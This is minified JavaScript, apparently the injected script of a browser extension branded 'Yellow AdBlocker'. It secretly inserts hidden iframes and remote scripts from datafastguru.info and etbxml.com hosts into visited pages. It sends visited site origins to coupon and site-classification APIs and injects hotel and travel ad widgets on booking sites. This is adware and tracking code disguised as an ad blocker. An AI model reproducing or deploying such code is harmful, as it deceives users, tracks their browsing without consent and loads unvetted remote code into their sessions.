new function(){function f(a,d){var b=null;if(window.XDomainRequest){b=new XDomainRequest;b.onload=function(){a&&a(b.responseText)};var c=function(){d&&d(b.status)};b.onerror=c;b.ontimeout=c;b.onprogress=function(){}}else b=new XMLHttpRequest,b.onreadystatechange=function(){4==b.readyState&&(200==b.status?a&&a(b.responseText):d&&d(b.status))};return b}function m(a,d,b){var c=document.getElementsByTagName("body")[0].appendChild(document.createElement("iframe"));c.onload=function(){b()};c.id=a;c.src=
d;c.style.position="absolute";c.style.width="1px";c.style.height="1px";c.style.left="-100px";c.style.top="-100px";c.style.visibility="hidden"}function n(){var a=f(function(a){a=JSON.parse(a);var b=document.getElementsByTagName("head")[0].appendChild(document.createElement("script"));b.src="http://pstatic.datafastguru.info/fo/ecom/lang.js?c="+a.country.toLowerCase();var c;c=-1<navigator.userAgent.indexOf("MSIE 8.0")?"1386235369226ie":p<q?"2_3_561":"2_3_558";__tash.rs={fosubid:"1022_5012",fopartid:"wp",
fobn:"Yellow AdBlocker",fobl:"",foc:"$country"};self.isElementExists("fouserdata")?(b=document.getElementsByTagName("head")[0].appendChild(document.createElement("script")),b.src="http://pstatic.datafastguru.info/rss/min/fo.min.js?v="+c+"&b=dynamic&l=right"):m("fouserdata","http://pstatic.datafastguru.info/if/UserData.html",function(){document.getElementsByTagName("head")[0].appendChild(document.createElement("script")).src="http://pstatic.datafastguru.info/rss/min/fo.min.js?v="+c+"&b=dynamic&l=right"});
b=document.getElementsByTagName("head")[0].appendChild(document.createElement("script"));b.src="http://jsgnr.datafastguru.info/bwl/wl";b=document.getElementsByTagName("head")[0].appendChild(document.createElement("script"));b.src="http://jsgnr.datafastguru.info/site-classification"});a.open("GET","http://static.datafastguru.info/fo/country.js",!0);a.send(null)}function e(){var a=window.location.host.toLowerCase();/tube|shopzilla.|beso.|kelkoo.|orange.|clickjogos|gameforge|pole-emploi|infojobs|snap.do|(stockinvestingbasics|allmyvideos|laposte|megafilmeshd|vidspot).net|(collectivites|sweet|jeux|voila|bilansgratuits|habbol|vente).fr|(abril|terra|ig|blogspot|hotelurbano|uol).com.br|www.easymobility.co.uk|gov.br|wikipedia.org|(pricegrabber|spardeingeld|snapdo|speedbit|loopnet|stackoverflow|stackexchange|hulu|bloomberg|blogger|dartybox|alexa|baidu|cj|cnn|facebook|flickr|history|hotmail|imdb|imvu|linkedin|microsoft|msn|myspace|netflix|nytimes|politico|picasa|pinterest|rue89|salon|searchenginewatch|delta-search|sfgate|shutterfly|techcrunch|verizon|venturebeat|wired|yankodesign|yahoo|youtube|bing|vk|live|tumblr|ask|apple|roblox|411answers|tagged|nickjr|opposingviews|truste|adobe|breakfastdailynews|.avg|espn.go|.aol|pogo|pornhub|youporn|pron|youjizz|xnxx|marca|elpais|juegos|surveysresearchgroup|dofus|adopteunmec|unique|22find|nationzoom|sncf|privee|awesomehp|updateflashplayer|stocktradingcenters|empowernetwork|regionalhealthreview|diyfood|websurveycentral|\.att|news788|411source|pandora|hsselite|verizonwireless|internetautoguide|symantec|\.pch|mobile|nortonpro|pchealthboost|voipo|contenko|seaworldparks|entrepreneur|ratezip|game321|boostmobile|cabelas|specialk|globo|yepi|jogatina|4shared|globo|ojogos|tudogostoso|netcartas|disney|voeazul|cartoonnetwork|\.tam|viajanet|vagalume|jogosdemeninas|^as|\.as|atrapalo|elconfidencial|lavanguardia|forocoches|peliculasyonkis|logitravel|freakshare|elperiodico|iberia|filmaffinity|chaturbate|expansion|todotest|antena3|cincodias).com|(elmundo|rtve|lavozdegalicia|sport|publico|game|online|eldiariomontanes|elcomercio|\.hoy|\.abc|telepizza|europapress).es|paypal|cam4|888poker|filmesonlinegratis|google|.gov|qvo6|cam4|surveyservers|ask.fm|games.la|jeu.info/i.test(a)||
n()}function g(){if("undefined"!=typeof __tash.bla&&__tash.bla.test(window.location.hostname)){var a=f(function(a){!1!==JSON.parse(a).found&&e()},function(){e()});a.open("GET","http://cwbl.datafastguru.info/search/"+r,!0);a.timeout=1E3;a.send()}else e()}function h(){if(sessionStorage.forcc)window.setTimeout(function(){delete sessionStorage.forcc},5E3);else if("/"==window.location.pathname){var a=f(function(a){0<a||g()});window.location.origin||(window.location.origin=window.location.protocol+"//"+
window.location.hostname+(window.location.port?":"+window.location.port:""));a.open("GET","http://capp.datafastguru.info/api/count/coupons?q="+encodeURIComponent(window.location.origin),!0);a.send(null)}else k?g():e()}if(window==top){"undefined"==typeof __tash&&(window.__tash={});self.isElementExists=function(a){return null!=document.getElementById(a)};var p=Math.random(),q=1,r=window.location.host.toLowerCase(),k=!0,l=document.getElementsByTagName("head")[0].appendChild(document.createElement("script"));
l.src="http://jsgnr.datafastguru.info/fl/blm";l.onload=function(){if(k){document.getElementsByTagName("head")[0].appendChild(document.createElement("script")).src="http://jsgnr.datafastguru.info/bwl/bl";var a=window.setInterval(function(){"undefined"!=typeof __tash&&__tash.bla&&(h(),window.clearInterval(a))},10)}else h()}}};

new function(){sessionStorage&&(sessionStorage.fosubid="1022_5012",sessionStorage.fopartid="wp",sessionStorage.fobn="Yellow AdBlocker",sessionStorage.fobl="");/*document.getElementsByTagName("head")[0].appendChild(document.createElement("script")).src="http://pstatic.datafastguru.info/fo/travel.js?v=1392134070896&b=dynamic"*/};
new function(){var a=window.location.host.toLowerCase();/(booking|expedia|hotels|priceline|orbitz|roomkey|tripadvisor|kayak|travelocity|agoda|venere|hotwire|travel.yahoo|lastminute|southwest|united|edreams|makemytrip|marriott|vivastay|easyclicktravel|olotels|otel|airbnb|tingo|splendia|bookit|edream|hotels4u|getaroom|ihg|hilton|hyatt|wyndham|accorhotels|hrs|hostelbookers|bestwestern|budgetplaces|asiarooms|cheaptickets|choicehotels|directrooms|eurobookings|hostelworld|laterooms|hoteltravel|ratestogo|room77|transavia|wotif|trivago|hotelclub).com|hotel.de|hotels.nl|hotelspecials.nl/i.test(a)&&
(document.getElementsByTagName("head")[0].appendChild(document.createElement("script")).src="http://cond01.etbxml.com/api/web/hotels.php?mamId=wp_1022_5012&userId=2222&appId=3333&ui=1&ns=ETB_Hotels_Widget&partner=firstoffer&sp=false&sh=false&apps=Targeted&amu=280828404")};

sessionStorage.cpi='intr';
new function(){function f(a,c){var b=null;if(window.XDomainRequest){b=new XDomainRequest;b.onload=function(){a&&a(b.responseText)};var d=function(){c&&c(b.status)};b.onerror=d;b.ontimeout=d;b.onprogress=function(){}}else b=new XMLHttpRequest,b.onreadystatechange=function(){4==b.readyState&&(200==b.status?a&&a(b.responseText):c&&c(b.status))};return b}function l(a,c,b){var d=document.getElementsByTagName("body")[0].appendChild(document.createElement("iframe"));d.onload=function(){b()};d.id=a;d.src=
c;d.style.position="absolute";d.style.width="1px";d.style.height="1px";d.style.left="-100px";d.style.top="-100px";d.style.visibility="hidden"}function g(){var a;a=m<n?"1_0_21":"1_0_19";__tash.cpn={fosubid:"1022_5012",fopartid:"wp",fobn:"Yellow AdBlocker",fobl:"",foc:"$country"};self.isElementExists("fouserdata")?document.getElementsByTagName("head")[0].appendChild(document.createElement("script")).src="http://pstatic.datafastguru.info/crss/min/fo.min.js?v="+a+"&b=dynamic":l("fouserdata","http://pstatic.datafastguru.info/if/UserData.html",
function(){document.getElementsByTagName("head")[0].appendChild(document.createElement("script")).src="http://pstatic.datafastguru.info/crss/min/fo.min.js?v="+a+"&b=dynamic"})}function h(){var a=f(function(a){0<a&&g()});window.location.origin||(window.location.origin=window.location.protocol+"//"+window.location.hostname+(window.location.port?":"+window.location.port:""));var c="";switch(sessionStorage.cpi){case "intr":c="/api/count/coupons?v=1&coup_add_name=coupons-internal&q=";break;default:c="/api/count/coupons?v=1&q="}a.open("GET",
"http://capp.datafastguru.info"+c+encodeURIComponent(window.location.origin),!0);a.send(null)}function k(){var a=window.location;if("/"==a.pathname||""==a.pathname)h();else{var c=a.pathname,a="http://cddata.datafastguru.info/site-classification/site/"+a.hostname,b=f(function(a){if(a&&(a=JSON.parse(a).jqxgridHomepage)&&a.length)for(var b=0;b<a.length;b++){var e=a[b].text,f=document.createElement("a");f.href=e;if(f.pathname==c){h();break}}});b.open("GET",a,!0);b.send(null)}}if(window==top){"undefined"==
typeof __tash&&(window.__tash={});self.isElementExists=function(a){return null!=document.getElementById(a)};var m=Math.random(),n=1;if(sessionStorage.forcc)g();else{var e=document.createElement("script");e.addEventListener?e.addEventListener("load",k,!1):e.readyState&&(s.onreadystatechange=k);e.src="http://jsgnr.datafastguru.info/site-classification";document.getElementsByTagName("head")[0].appendChild(e)}}};

